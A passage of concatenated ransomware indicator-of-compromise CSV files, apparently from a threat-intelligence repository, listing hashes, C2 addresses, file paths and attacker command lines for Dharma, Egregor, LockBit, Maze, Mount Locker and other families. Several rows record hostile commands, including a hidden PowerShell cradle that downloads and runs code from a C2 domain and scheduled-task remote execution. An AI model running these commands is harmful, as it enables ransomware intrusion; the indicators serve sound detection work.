file_name,toolbelt1.ps1,Secondary Dharma control script, 46 | file_name,Start-Tor.ps1,, 47 | file_name,Email-Screenshot.ps1,Dharma script to exfiltrate system data by emailing screenshots, 48 | file_name,rdpv.exe,Nirsoft RDP password viewer, 49 | file_name,takeaway.exe , RarSFX carrying Dharma payload, 50 | file_name,winhost.exe,Dharma ransomware, 51 | file_name,purgememory.ps1,, 52 | file_name,ns2.exe,Dharma network scanner, 53 | file_name,bulletspassview.chm,Nirsoft password viewer, 54 | file_name,bulletspassview.exe,Nirsoft password viewer, 55 | file_name,chromepass.cfg,Nirsoft password viewer, 56 | file_name,chromepass.chm,Nirsoft password viewer, 57 | file_name,chromepass.exe,Nirsoft password viewer, 58 | file_name,dialupass.chm,Nirsoft password viewer, 59 | file_name,dialupass.exe,Nirsoft password viewer, 60 | file_name,iepv.chm,Nirsoft password viewer, 61 | file_name,iepv.exe,Nirsoft password viewer, 62 | file_name,mailpv.chm,Nirsoft password viewer, 63 | file_name,mailpv.exe,Nirsoft password viewer, 64 | file_name,mspass.cfg,Nirsoft password viewer, 65 | file_name,mspass.chm,Nirsoft password viewer, 66 | file_name,mspass.exe,Nirsoft password viewer, 67 | file_name,netpass.cfg,Nirsoft password viewer, 68 | file_name,netpass.chm,Nirsoft password viewer, 69 | file_name,netpass.exe,Nirsoft password viewer, 70 | file_name,passwordfox.chm,Nirsoft password viewer, 71 | file_name,passwordfox.exe,Nirsoft password viewer, 72 | file_name,pstpassword.chm,Nirsoft password viewer, 73 | file_name,pstpassword.exe,Nirsoft password viewer, 74 | file_name,routerpassview.cfg,Nirsoft password viewer, 75 | file_name,routerpassview.chm,Nirsoft password viewer, 76 | file_name,routerpassview.exe,Nirsoft password viewer, 77 | file_name,sniffpass.cfg,Nirsoft password viewer, 78 | file_name,sniffpass.chm,Nirsoft password viewer, 79 | file_name,sniffpass.exe,Nirsoft password viewer, 80 | file_name,webbrowserpassview.cfg,Nirsoft password viewer, 81 | file_name,webbrowserpassview.chm,Nirsoft password viewer, 82 | file_name,webbrowserpassview.exe,Nirsoft password viewer, 83 | file_name,wirelesskeyview.chm,Nirsoft password viewer, 84 | file_name,wirelesskeyview.exe,Nirsoft password viewer, 85 | file_name,javsecc.exe,Dharma AutoIT container for Tor relay, 86 | ip,185.20.187.20,Host storing some of Dharma RaaS files, 87 | sha1,b7dc961e4485c967f43f1be6fbbe067a81cc2181,takeaway.exe, 88 | sha1,23ef76d2e4cec624821c9ca087376c2a4584db45,takeaway.exe, 89 | sha1,4576efe2b713b1fd1a967b9beec57bf66a6cdbf8,takeaway.exe, 90 | sha1,e5f3330884a48c5fa462e0299f4bff261b4dbc80,takeaway.exe, 91 | sha1,15d4894e73dfe5f63061462a1bf6a9b5976457c2,takeaway.exe, 92 | sha1,6fb1fb1641c1faf65b5d7c786b7ea0df0be14b4b,takeaway.exe, 93 | sha1,1eea0f017bffa0a868605f373efa74b4858e1c37,takeaway.exe, 94 | sha1,629c9649ced38fd815124221b80c9d9c59a85e74 ,NS2.ex, 95 | sha1,5adfa3cc0480795406f69170f9fcf2b34a5984e3 ,purgeMemory.ps1, 96 | sha1,5ac57e3d0e94e87f9ed14a7351c770932c4b7d08, takeaway.ps1, 97 | sha1,55e1e325d3849dff0daf50bf330ce28155ab7e51 ,winhost.ex, 98 | sha256,1cec5e4563e2c1570353e54a4ecc12ab4d896ab7227fd8651adcd56b884c0c1c,GdAgentSrv.de.dll, 99 | sha256,28042dd4a92a0033b8f1d419b9e989c5b8e32d1d2d881f5c8251d58ce35b9063,Process Hacker, 100 | -------------------------------------------------------------------------------- /Ransomware-Egregor.csv: -------------------------------------------------------------------------------- 1 | Indicator_type,Data,Note 2 | Description,IOCs of Egregor attacks, 3 | sha1,695b506c07779ba0e543fabfd63752c0ac44a13d,Egregor ransomware detected as Mal/Sekhmet-A and Troj/Ransom-GCN 4 | sha1,d8cbce281626bb5c14f59a979e243e6b260363ba,"SystemBC, detected as Mal/EncPk-APV" 5 | sha1,59ca484e8d766ec7980d6c2a297b4d401dc386f5,"Cobalt Strike payload, detected as ATK/Cobalt-P" 6 | sha1,f73e31d11f462f522a883c8f8f06d44f8d3e2f01,Egregor ransomware detected as Troj/Ransom-GCG 7 | sha1,bd8c52bb1f5c034f11f3048e2ed89b7b8ff39261,"Egregor ransomware variant, detected as Troj/Agent-BFPD and Troj/Ransom-GCT" 8 | sha1,c3467862e0e410ad2eb72cb3d810199499db017d,Mal/QbotVbs-A (Qbot) detected concurrently with Egregor 9 | filepath,C:\perflogs\clang.dll,Drop point for Egregor in Cobalt Strike attack 10 | command_line_parameter,"rundll32.exe  C:\Windows\sed.dll,DllRegisterServer -passegregor1313 --full",Egregor execution command line 11 | command_line_parameter,"rundll32.exe  C:\Windows\sed.dll,DllRegisterServer -passegregor1313 --full",Egregor execution command line 12 | command_line_parameter,"C:\WINDOWS\system32\cmd.exe /c """"e.bat"" -passegregor1313""",Egregor execution command line 13 | command_line_parameter,"rundll32.exe C:\perflogs\clang.dll,DllRegisterServer -peguard6",Egregor execution command line -------------------------------------------------------------------------------- /Ransomware-EpsilonRed.csv: -------------------------------------------------------------------------------- 1 | Indicator_type,Data,Note 2 | Description,IOCs from https://news.sophos.com/en-us/2021/05/28/epsilonred/, 3 | sha256,57EE78299598170C766FF73CEFCA9E78B9B81AC6999E8ADB61903BC89BE313BA,red.ps1 4 | sha256,7259975D7E3B3D9D059A38F4393AB920764B46CA243E192E08F7699999382E07,RED.7z archive (contains all subsequent files) 5 | sha256,172BBF46E5F46DD7A9EA0C22054B644F60EFC3A9AD26A6F0E95CA57E38AF60A7,1.ps1 file 6 | sha256,9845619CB9C3612055A934C4270568391832EAB40A66DBB22B1B37FA05559C92,2.ps1 file 7 | sha256,5120998FA1482D4D0D0099D91AAB2AF647C0272819D7DCF792EEC01C77AB9391,3.ps1 file 8 | sha256,4D6272AEADF7FC131AC126DC07D7BFD2E878D359E5E7BB5376A67295CE05FC15,4.ps1 file 9 | sha256,0794C8630F40F04C0E7CEA40F11DC3F1A829A3BE69852FE9E184AA8B7ED20797,5.ps1 file 10 | sha256,7A8128F8788524E54A69619B69870DFD4C50DB46E3EB786899F7275DAB73D2D9,6.ps1 file 11 | sha256,4EAF5E93953756BC2196BFCFB030B6EAAD687FA1E8DB9F47B09819F3B4315230,7.ps1 file 12 | sha256,8C294F1EF05DF823460BD11CE34EA7860178DE6BC3D9B0127A3B9C08CF62437F,8.ps1 file 13 | sha256,A9A6D35469E471666758ED5D1174EDC5B650C0ACB2C351213EADFB408F74BDCB,9.ps1 file 14 | sha256,039DA6B099303FDFD087BB7DF94012780DFE375C67234CE495C78CF2DCF7FD9D,10.ps1 file 15 | sha256,699FFB898864BF804CF726F39B5E8168D55E44FC1584B71BA25E31B43AE543E8,11.ps1 file 16 | sha256,EE10F3A798AAA03F4CED2DDB28D2B36FE415EA2CBBD9C3B97B2A230A72D77F5C,12.ps1 file 17 | sha256,C1F963ABA616680E611601E446955E9552C69DB23DABAB8444718D82AD830029,C.ps1 file 18 | sha256,5AA7DE7EAB570522C93D337D395396057033AD6596DB4A0BDA15D77A6D4C6C3A,S.ps1 file 19 | sha256,84755B2177B72364918F18C62A23854E7A8A66C4F5005CC040357850ADF9D811,P.exe 20 | sha256,ce5ba1e5d70d95d52b89a1b8278ff8dd4d1e25c38c90ca202b43bdc014795d78,rutserv.exe (Remote Utilities installer) 21 | sha256,35ffc1263005fd0a954deed20a7fb0cd53dbab6bb17ff8bd34559a5a124686c7,rutserv.exe (Remote Utilities installer) 22 | domain,epsilons[.]red, 23 | info,https://j.mp/epsilonred-cleanup,CyberChef recipe to render the PowerShell readable to humans 24 | -------------------------------------------------------------------------------- /Ransomware-LockBit.csv: -------------------------------------------------------------------------------- 1 | Indicator_type,Data,Note 2 | Description,Files from the Lockbit ransomware report,https://news.sophos.com/en-us/2020/10/21/lockbit-attackers-uses-automated-attack-tools-to-identify-tasty-targets/ 3 | file_path_name,C:\Windows\System32\CloudBAK.exe,Renamed PowerShell.exe 4 | file_path_name,C:\Windows\System32\defrag32.exe,Renamed PowerShell.exe 5 | file_path_name,C:\Windows\System32\diagnosticMem.exe,Renamed PowerShell.exe 6 | file_path_name,C:\Windows\System32\Ras.exe,Renamed PowerShell.exe 7 | file_path_name,C:\Windows\System32\wermgupd.exe,Renamed PowerShell.exe 8 | file_path_name,C:\Windows\System32\wermreport.exe,Renamed PowerShell.exe 9 | filename,1_Remote Desktop Connectio~.lnk ,LNK file for backdoor persistence 10 | filename,Remote Desktop Connection.lnk,Mal/PowLnkObf-A LNK file for backdoor persistence 11 | ip,142.91.170.175,LockBit persistent backdoor downloader 12 | ip,142.91.170.6,LockBit backdoor C&C 13 | sha256,0b6cb591f1a0db7d74d8e802000fce9a61bfe520922eefbad1166d1f7c13d222,LNK file for backdoor persistence 14 | sha256,397138156bb09696045398ca709bcaa73e0fe7cc48be9b6654f29bce0c535015,Log obfuscation data for LockBit 15 | sha256,4250172289cf5e82f5decd7b72d3455538faf7dc26c97abfcfa243aae2a66d8e,LockBit Task Scheduler data file 16 | sha256,443cd5c871a7e0e75284c10c279a9d19156c44d2a038f35c3abd83ecd52cb14c,Mal/PSDL-J PowerShell 17 | sha256,49614c9b05cceea11c341e790283ee75606bd304dc0c9899a1d4a036bda33f8a,Mal/PowLnkObf-A LNK file for backdoor persistence 18 | sha256,560f5444461de30e9b2f00a8cb37f4c6d736bb35cc9fb85894b198c59508cde7,Log obfuscation data for LockBit 19 | sha256,5819b1d4ee001e387223a7a6fc1ad4a476e45ccd75b354932108073985c05b95,LockBit PowerShell backdoor 20 | sha256,af5511fd2bfda3970d7ed82d0138ff9388f17f55fcfbbee0ee37e9608c91bb65,LockBit PowerShell backdoor 21 | sha256,e6f11f2dd14c5fde7695a3b6185fbeb1bfc7376ad58597d6969c0307585858b0,Log obfuscation data for LockBit 22 | sha256,ff61e09fbd4515297004a025b0ef1d502548a9f4a1ba3bf25ebfb93ac18fbf27,Mal/PSDL-J PowerShell 23 | url,https://docs.google.com/spreadsheets/d/11C7pdR3r_VeOPQXpRCGtUEJoftKO1wB7ZFfX0t94XTw/edit#gid=0&range=B1,LockBit backdoor installer loader URL 24 | -------------------------------------------------------------------------------- /Ransomware-Lockbit3-IOCs.csv: -------------------------------------------------------------------------------- 1 | Indicator_type,Data,Note 2 | Description,IoCs related to Lockbit 3.0 ransomware,https://news.sophos.com/en-us/2022/11/30/lockbit-3-0-black-attacks-and-leaks-reveal-wormable-capabilities-and-tooling 3 | sha256,0d38f8bf831f1dbbe9a058930127171f24c3df8dae81e6aa66c430a63cbe0509,Troj/Lockbit-F 4 | sha256,168ab5ce440d53ca7397cf3da86d68a67264c6bb0e3f6c8f2066132d6d129bdd,c:\logs\lbb_rundll32_pass.dll. This file was not retrieved from the target and is not available on VT 5 | sha256,18f0898d595ec054d13b02915fb7d3636f65b8e53c0c66b3c7ee3b6fc37d3566,c:\users\\downloads\netscan\netscan.exe : 6 | sha256,2308cef810b30ccb5be11fc664ce51b41bb6cee703f09d0a348771cf11f4dc9e,c:\users\\desktop\avremover_nt64_enu.exe : 7 | sha256,307eb30c7d3640ca11f564b1dbbb7a133236c3c9b45192ddcb317477a9f54b59,c:\users\\desktop\backstab64.exe : 8 | sha256,33987ca88cf48f7f9cfd46610f2c46e104f7c13f0285b5c6c2dca2c6290d9df5,Mal/FakeAV-JC 9 | sha256,35f971f9f84af8f4a42c97d6258c251e213f99741c1cfadfabbd5f1204e5658e,Mal/FakeAV-JC 10 | sha256,372d6d866798495d12b0ce745038fa2da575f22c30b061b948804cfdd8d11224,ML/PE-A + W32/Neshta-D (Gmer infected with Neshta) 11 | sha256,391a97a2fe6beb675fe350eb3ca0bc3a995fda43d02a7a6046cd48f042052de5,Troj/Lockbit-F 12 | sha256,39c363d01fb5cd0ed3eeb17ca47be0280d93a07dda9bc0236a0f11b20ed95b4c,Mal/FakeAV-JC 13 | sha256,4f61f20fa1edfd0ce1de2ca8110c725c9d9c16a9680748c12042a3302054fc72,GMER 14 | sha256,5043e94612cc5111c07f30968e7bc78e96e277f55262064207a9cd87bc23a343,Troj/Lockbit-F 15 | sha256,506f3b12853375a1fbbf85c82ddf13341cf941c5acd4a39a51d6addf145a7a51,c:\users\\downloads\lbb_pass.exe : Lockbit executable 16 | sha256,7d58338f7e5b4b77459835a2e057a07f81f72991a0e282d079fd5e227f68b5de,ardrv.sys 17 | sha256,80e8defa5377018b093b5b90de0f2957f7062144c83a09a56bba1fe4eda932ce,Troj/Lockbit-F 18 | sha256,8834c84cfd7e086f74a2ffa5b14ced2c039d78feda4bad610aba1c6bb4a6ce7f,c:\users\\downloads\netscan\sd.exe : (creates snapshot of the filesystem) 19 | sha256,90235e199dcb2cd6fa2e68fbfc46f1aa649f2438210fd833b8e7e748b6428ba4,Troj/Lockbit-F 20 | sha256,986a88c4053d398624c7736a5f60d2561760b7a532677fc251c8c3dac8f3f60e,OPSWAT OESIS V4 Removal Module (https://www.opswat.com/products/oesis-framework) 21 | sha256,9a34909703d679b590d316eb403e12e26f73c8e479812f1d346dcba47b44bc6e,Mal/FakeAV-JC 22 | sha256,a56b41a6023f828cccaaef470874571d169fdb8f683a75edd430fbd31a2c3f6e,Troj/Lockbit-F 23 | sha256,c6861032317562532c21e373b88efacdc1307c8a3efce8c8992584171157ebed,Troj/Lockbit-F 24 | sha256,c6cf5fd8f71abaf5645b8423f404183b3dea180b69080f53b9678500bab6f0de,Troj/Lockbit-F 25 | sha256,d61af007f6c792b8fb6c677143b7d0e2533394e28c50737588e40da475c040ee,Troj/Lockbit-F 26 | sha256,e8a3e804a96c716a3e9b69195db6ffb0d33e2433af871e4d4e1eab3097237173,GMER 27 | sha256,f4ab473dcb45beb8cb01ad616422c05a45134c6b028f310f06543e2c33584cef,Troj/Lockbit-F 28 | sha256,fd98e75b65d992e0ccc64e512e4e3e78cb2e08ed28de755c2b192e0b7652c80a,Troj/Lockbit-F 29 | file_path_name,c:\logs\lbb_rundll32_pass.dll,168ab5ce440d53ca7397cf3da86d68a67264c6bb0e3f6c8f2066132d6d129bdd. This file was not retrieved from the target and is not available on VT 30 | file_path_name,c:\logs\lbb_ps1_obfuscated.ps1, 31 | file_path_name,c:\logs\lbb_ps1_pass.ps1, 32 | file_path_name,c:\logs\lbb_pass.exe,506f3b12853375a1fbbf85c82ddf13341cf941c5acd4a39a51d6addf145a7a51 33 | file_path_name,c:\logs\avremover_nt64_enu.exe,2308cef810b30ccb5be11fc664ce51b41bb6cee703f09d0a348771cf11f4dc9e 34 | file_path_name,c:\logs\backstab_x64.exe, 35 | file_path_name,c:\logs\backstab_x86.exe, 36 | file_path_name,c:\logs\gmer3.exe, 37 | file_path_name,c:\logs\gmer2.exe, 38 | file_path_name,c:\logs\backstab64.exe,307eb30c7d3640ca11f564b1dbbb7a133236c3c9b45192ddcb317477a9f54b59 39 | file_path_name,c:\logs\gomer.exe, 40 | file_path_name,c:\desktopcentral\lbb___.zip, 41 | file_path_name,c:\desktopcentral\psp.ps1, 42 | file_path_name,c:\desktopcentral\ps.ps1, 43 | file_path_name,c:\users\\downloads\gmer.exe, 44 | file_path_name,c:\users\\downloads\sophos-removal-tool-master.zip, 45 | file_path_name,c:\users\\downloads\sophoscentralremoval-master.zip, 46 | file_path_name,c:\users\\downloads\uninstallscript.ps1, 47 | file_path_name,c:\users\\downloads\netscan\zam.bat, 48 | file_path_name,c:\users\\downloads\netscan\uninstallsophos.bat, 49 | file_path_name,c:\users\\downloads\netscan\turnoff.bat, 50 | file_path_name,c:\users\\downloads\netscan\netscan.exe,18f0898d595ec054d13b02915fb7d3636f65b8e53c0c66b3c7ee3b6fc37d3566 51 | -------------------------------------------------------------------------------- /Ransomware-Maze.csv: -------------------------------------------------------------------------------- 1 | Indicator_Type,Data,Note, 2 | Description,Indicators for Maze ransomware,https://news.sophos.com/en-us/2020/09/17/maze-attackers-adopt-ragnar-locker-virtual-machine-technique, 3 | command_line,cmd.exe /c c:\programdata\3.bat,,591d08c34b2d6945b39798a836f2cbaa9af7e8573df9de82038cfe0bef728255 4 | command_line,"cmd.exe /C mklink /j ""C:\SDRSMLINK\Documents and Settings"" ""C:\Documents and Settings""",,6e742521a05a30c256bb5aa3a83e317132230c84e205aef9b200dbf1d1d52ac4 5 | command_line,"cmd.exe /C mklink /j ""C:\SDRSMLINK\Program files (x86)"" ""C:\Program files (x86)""",,5b579e53f60a2f5dcf1d29fd23a86d6efe3aba784f95165e1618db1ee1ace425 6 | command_line,"cmd.exe /C mklink /j ""C:\SDRSMLINK\Program files"" ""C:\Program files""",,f56775b2bc86a692982b0013e1d3ed5445db708ebbb0e70001b9e6df1dfbd193 7 | command_line,"cmd.exe /C mklink /j ""C:\SDRSMLINK\System Volume Information"" ""C:\System Volume Information""",, 8 | command_line,cmd.exe /C mklink /j C:\SDRSMLINK\$Recycle.Bin C:\$Recycle.Bin,,ed3d476caf7a5f6c80e5dccc9861c5af854fc185124064a33c1cadc8ba9e4367 9 | command_line,cmd.exe /C mklink /j C:\SDRSMLINK\Config.Msi C:\Config.Msi,, 10 | command_line,cmd.exe /C mklink /j C:\SDRSMLINK\ProgramData C:\ProgramData,, 11 | command_line,cmd.exe /C mklink /j C:\SDRSMLINK\Recovery C:\Recovery,, 12 | command_line,cmd.exe /C mklink /j C:\SDRSMLINK\Restore C:\Restore,, 13 | command_line,cmd.exe /C mklink /j C:\SDRSMLINK\StorageReports C:\StorageReports,, 14 | command_line,cmd.exe /C mklink /j C:\SDRSMLINK\TEMP C:\TEMP,, 15 | command_line,cmd.exe /C mklink /j C:\SDRSMLINK\Users C:\Users,, 16 | command_line,cmd.exe /C mklink C:\SDRSMLINK\DECRYPT-fileS.txt C:\DECRYPT-fileS.txt,, 17 | command_line_parameter,enc.exe --logging,, 18 | command_line_parameter,enc6.exe --logging,, 19 | command_line_parameter,regsvr32.exe /i c:\programdata\network.dll,, 20 | command_line_parameter,[cmd /c msiexec /qn /i \\[compromised-server-name]\frs\pikujuwusewa.msi],, 21 | command_line_parameter,C:\Program files (x86)\pikujuwusewa\app64\VBoxHeadless.exe --startvm micro -v off,, 22 | command_line_parameter,C:\Program files (x86)\pikujuwusewa\app64\VBoxSVC.exe /reregserver,, 23 | command_line_parameter,C:\Program files (x86)\pikujuwusewa\app64\VBoxSVC.exe /unregserver,, 24 | command_line_parameter,C:\Program files (x86)\pikujuwusewa\app64\VBoxSVC.exe -Embedding,, 25 | command_line_parameter,"cmd /c SCHTASKS /s [ip-address-of-target] /RU ""SYSTEM"" /create /tn ""Google Chrome Security Update"" /tr ""c:\programdata\license.exe"" /sc ONCE /sd 01/01/1910 /st 00:00 /f",, 26 | command_line_parameter,"cmd /c SCHTASKS /s [ip-address-of-target] /run /TN ""Google Chrome Security Update""",, 27 | command_line_parameter,"cmd.exe /C ""C:\Program files (x86)\pikujuwusewa\app64\VBoxSVC.exe"" /reregserver",, 28 | command_line_parameter,"cmd.exe /C ""C:\Program files (x86)\pikujuwusewa\app64\VBoxSVC.exe"" /unregserver",, 29 | command_line_parameter,"cmd.exe /C ""C:\Program files (x86)\pikujuwusewa\starter.bat""",, 30 | command_line_parameter,"cmd.exe /C regsvr32 /S /U ""C:\Program files (x86)\pikujuwusewa\app64\VBoxC.dll""",, 31 | command_line_parameter,"regsvr32 /S ""C:\Program files (x86)\pikujuwusewa\app64\VBoxC.dll""",, 32 | command_line_parameter,"regsvr32 /S /U ""C:\Program files (x86)\pikujuwusewa\app64\VBoxC.dll""",, 33 | command_line_parameter,regsvr32.exe /i c:\programdata\network.dll --nomutex,, 34 | file,(hash not available),C:\programdata\license.exe, 35 | file,0df95fe05e4c6dbe7fd1cf4221ab3bf053761027cd496ac0a84eb435080245e9,vrun.exe, 36 | file,52b13207e6464a7fd57b02c3c4525339e91e60348e5a9e5d03f2b6faf117c82b,payload (.dll), 37 | file,591d08c34b2d6945b39798a836f2cbaa9af7e8573df9de82038cfe0bef728255 ,C:\ProgramData\enc6.exe, 38 | file,5b579e53f60a2f5dcf1d29fd23a86d6efe3aba784f95165e1618db1ee1ace425,C:\ProgramData\msinfo64.exe (meterpreter), 39 | file,6279e93c1ad63991b95dfd3775581835ec76f8b19a3c2947365d28736dd5741a,micro.vdi, 40 | file,6e742521a05a30c256bb5aa3a83e317132230c84e205aef9b200dbf1d1d52ac4,C:\ProgramData\enc.exe , 41 | file,7ee403ca56a0bd609ff8eb9f9c893eb06456be283e0c3a0feeda15fd32173742,C:\programdata\network.dll , 42 | file,dfb416add0a8d67800832863ab932cf3991424846a21de5dfff9de38e3df3c4f,preload.bat , 43 | file,f56775b2bc86a692982b0013e1d3ed5445db708ebbb0e70001b9e6df1dfbd193,C:\ProgramData\msinfo32.exe (Cobalt Strike), 44 | file,f9eb9b611e49910e4fabd56379fc6142ac51f2b7d1e0c82b9ca7f37ee5df43ac,pikujuwusewa.msi, 45 | ip_port,94.232.40.167:9338,Russia C2 - hxxps://dev.metasploit.com, 46 | registry_path_key_value,HKCU\SOFTWARE\LmuSMJdqtVATql /v uDyiciWrann /t REG_DWORD /d 2365,, 47 | scheduled_task_path,Windows Update Security Patches,C:\programdata\enc.exe / C:\programdata\enc6.exe , 48 | scheduled_task_path,Windows Update Security Patches 5,C:\programdata\enc.exe / C:\programdata\enc6.exe, 49 | scheduled_task_path,Windows Update Security ,regsvr32.exe /i c:\programdata\network.dll, 50 | scheduled_task_path,Google Chrome Security Update ,C:\programdata\license.exe, 51 | scheduled_task_path,Windows Update Security Patches 2 ,C:\programdata\enc.exe / C:\programdata\enc6.exe, 52 | url,94.232.40.167:9338/dot.gif,, 53 | url,94.232.40.167:9338/visit.js,, 54 | -------------------------------------------------------------------------------- /Ransomware-MegaCortex: -------------------------------------------------------------------------------- 1 | File hashes: 2 | MegaCortex: 3 | 478dc5a5f934c62a9246f7d1fc275868f568bc07 4 | 81bb640d960fd68869a569f40835447971e7b235 5 | 9b7105dd54c009844c31cd2320a407637c527a3a 6 | 9bdf5448971b6ee148cbbed8398f99b88839fcf8 7 | a5177bb1c60c716c67bc4fec2524b332979a8bba 8 | ae54575ab8e0024c1444e84a97bbd239706d3ded 9 | ba79b583b6a35dd38f25afd28055cce1835fffd3 10 | f48b41e4356d6a35cef36ef6153755d8d2ec3f0b 11 | 12 | Cobalt Strike reflexive loader: 13 | 6544e16c316e4700e9271deb31242edf600599c7 14 | 6ca2f90a579d995c334ab1fbfbcbe1199507ad45 15 | 7772c87601440e93c6d990f4ee31eed314e9c20d 16 | 80fcdf1201299dec71163c28e232e826eb7e580f 17 | 851468365a19bcebeaf05091547ada838009c0d6 18 | bed9e0bed8a10bc5a065e106ed51fe2710b3ede8 19 | d4b0a1fcfa64312f30f710f11c22b8f1ecc8a981 20 | de07ddc179f7b55f16f7023c0d82aefabd1426c5 21 | fe4e836e635c72ea435b0ff66bc3d487ca2aaa72 22 | 0ce8fcc43f001cff54408bb1c2895880cb900f7c 23 | 0dfa89d5d26d5269d3282907e3799224c9958af4 24 | 2bb0c3607a445d0c08b1a727d466a66843d4f449 25 | 411a0dec716c15e63dca2645c97afb5af8bc9e1a 26 | 7fc295772f9edd5edcb0f5a49e440c8f1bf95e7b 27 | 82c3f0a7a319bee0bfa20df92f8ed791930bac90 28 | 94275573efe6494874f048ce720836b847df3444 29 | bd71e9e0285ef2846fa2cecac9ff60826b002ce6 30 | d764cc88e979f7eff45765994ea68613038facf2 31 | edbd27610b7449c4cf2bb63f65c92ffcfb401627 32 | 5d32dab9dd235618a3767c38513c920fab0cf8d5 33 | 85e51a0ddd93eaf3a2604e603ce643d17a55dfa1 34 | 35 | Cobalt Strike Meterpreter shells: 36 | 31af48e1e61d85965fd3f4719306a3993550d7e7 37 | afa7575bf763cf312cbd420bfae50d331729cbfc 38 | e7223ac9968ecf707cc7cca10088ae9a9adec522 39 | 2849626522a45673a191265c245f934b91020e1c 40 | 41 | Other: 42 | 2f40abbb4f78e77745f0e657a19903fc953cc664 43 | 44 | Certificates: 45 | 46 | 3AN LIMITED 47 | Status Valid 48 | Issuer thawte SHA256 Code Signing CA 49 | Valid from 12:00 AM 03/15/2019 50 | Valid to 11:59 PM 03/14/2020 51 | Valid usage Code Signing 52 | Algorithm sha256RSA 53 | Thumbprint 60974F5CC654E6F6C0A7332A9733E42F19186FBB 54 | Serial number 04 C7 CD CC 16 98 E2 5B 49 3E B4 33 8D 5E 2F 8B 55 | 56 | PRO-STO, TOV 57 | Status Trust for this certificate or one of the certificates in the certificate chain has been revoked. 58 | Issuer Sectigo RSA Code Signing CA 59 | Valid from 01:00 AM 03/01/2019 60 | Valid to 12:59 AM 03/01/2020 61 | Valid usage Code Signing 62 | Algorithm sha256RSA 63 | Thumbprint 3B3BA7DAAA011A33447E607FCD178BE6FBE190BE 64 | Serial number 00 CA 0E 70 90 D4 82 70 04 C9 9A F2 FC 7D 73 3C 02 65 | -------------------------------------------------------------------------------- /Ransomware-Midas.csv: -------------------------------------------------------------------------------- 1 | Indicator_type,Data,Note 2 | Description,IoCs related to Midas ransomware, 3 | sha-256,fe5e26ee2e15cbc10970fc3f0d249b02bbbc79b8dbc7adbd41340f3c0a4afd8d,"legitimate, benign dism.exe abused to load dismcore.dll" 4 | sha-256,3d779d02a0c7061caa8b412119a27b39692f3ecba80aa5e070434b95cf24b436,dismcore.dll Troj/MSIL-SDB 5 | sha-256,4823f478e5fb68be06ba987539c3e1c52e2597b0b35edc5b66fcedcef66fb1f6 ,encrypted form of https://github.com/monoxgas/sRDI (detected as ATK/sRDI-A) 6 | sha-256,0d43eca3777f98773314e04870bcbe76d6c5eb0694356509cd9f698d9a169f76,Harmony Loader (reflective loader decrypted during the attack) 7 | sha-256,de58d52374108d5ee8bd12b09034d4fa15ea5789b191e64ed1a559915ea393e8,example batch file used to start dism.exe (contains randomized path name) 8 | sha-256,73d62f5989336da3809c150861bac08c13547a9992181fec1c51741b53aeb2f3,example vbs script used to start batch file (contains randomized path name) 9 | IP,5.34.178.211,c2 address used by threat actors 10 | IP,185.16.40.78,c2 address used by threat actors 11 | file_path,c:\users\public\videos,Multiple PowerShell scripts run from this location on infected machines 12 | filename,lz_els.ps1,Run from c:\users\public\videos 13 | filename,adtest.ps1,Run from c:\users\public\videos 14 | filename,dism_els.ps1,Run from c:\users\public\videos 15 | filename,out32.ps1,Run from c:\users\public\videos 16 | -------------------------------------------------------------------------------- /Ransomware-MountLocker.csv: -------------------------------------------------------------------------------- 1 | Indicator_type,Data,Note 2 | Description,IoCs related to Mount Locker ransomware,https://news.sophos.com/en-us/2021/03/31/sophos-mtr-in-real-time-what-is-astro-locker-team/ 3 | command,"C:\Windows\system32\cmd.exe"" /c powershell.exe -nop -w hidden -c ""IEX ((new-object net.webclient).downloadstring('http://supercombinating[.]com:80/bug3')) ", 4 | command,"regsvr32 yesc64.dll /i:""/log:c"" ", 5 | command,"regsvr32  locker_64.dll /i:""/log:c"" ", 6 | command,regsvr32.exe /i c:\Users\\Music\archs64.dll , 7 | command,"regsvr32.exe /s ""C:\Users\\AppData\Local\Temp\diloay.dll"" ", 8 | domain,104.244.42.129 ,C2 server 9 | domain,139.60.162.19 ,C2 server 10 | domain,143.110.185.84 ,C2 server 11 | domain,185.162.235.61 ,C2 server 12 | domain,206.189.56.140 ,C2 server 13 | domain,31.13.93.174 ,C2 server 14 | domain,31.13.93.35 ,C2 server 15 | domain,52.204.190.157 ,C2 server 16 | domain,felpojdhf8980.cyou ,C2 server 17 | domain,supercombinating.com ,C2 server 18 | filename,Keatuxnf.dll ,Cobalt Strike 19 | filename,locker_64.dll,Mount Locker ransomware 20 | filename,niicok.dll,Cobalt Strike 21 | filename,RecoveryManual.html,Ransom note  22 | filepath,C:\inetpub\locker_64.dll,Mount Locker ransomware  23 | filepath,C:\Users\\AppData\Local\Temp\diloay.dll,Cobalt Strike 24 | filepath,C:\Users\\AppData\Local\Temp\miavan32.dll,Cobalt Strike 25 | filepath,C:\Users\\Music\x64\mimikatz.exe,Mimikatz  26 | filepath,C:\Users\\yesc64.dll,Mount Locker ransomware  27 | filepath,C:\Windows\ar664hs.dll,Cobalt Strike 28 | filepath,C:\windows\locker_64.dll,Mount Locker ransomware  29 | filepath,C:\Windows\SysWOW64\exploer.exe,Cobalt Strike 30 | scheduled task,C:\Users\\AppData\Local\Google\Chrome\User Data\FileTypePolicies\archs64.dll,Name: updater  31 | scheduled task,regsvr32.exe /i c:\Users\\Music\archs64.dll,Name: regsvr32 32 | scheduled task,regsvr32.exe C:\Users\\Music\archs64 regsvr32.exe /i ,Name: updater  33 | service,"%COMSPEC% /C ""whoami""",Named with random 16-digit string 34 | service,"%COMSPEC% /C echo wmic logicaldisk get description,name ^> %SYSTEMDRIVE%\WINDOWS\Temp\CIrmjHmIzofVNjPd.txt > \WINDOWS\Temp\KmsVUcNomePVWphR.bat & %COMSPEC% /C start %COMSPEC% /C \WINDOWS\Temp\KmsVUcNomePVWphR.bat",Named with random 16-digit string 35 | service,%COMSPEC% /C echo whoami ^> ZSYSTEMDRIVE%\WINDOWS\Temp\pkLneFsUyHywlUwZ.txt > \WINDOWS\Temp\sloKuaTCIYlTTPwM.bat & %COMSPEC% /C start %COMSPEC% /C \WINDOWS\Temp\sloKuaTCIYlTTPwM.bat,Named with random 16-digit string 36 | sha256,30ff38e859a849b6776dd7b0f299ba83605858f661297f39585bcf928769feef,Cobalt Strike 37 | sha256,5606c92af263869268a11eb730eb32d5fd770896530b23e42d2390d6ef230d61,Mount Locker ransomware DLL 38 | sha256,864930113d66c413bab705e79add3659efa95126449bfad05abf99c6d7e8ae00,Cobalt Strike 39 | -------------------------------------------------------------------------------- /Ransomware-Netfilim.csv: -------------------------------------------------------------------------------- 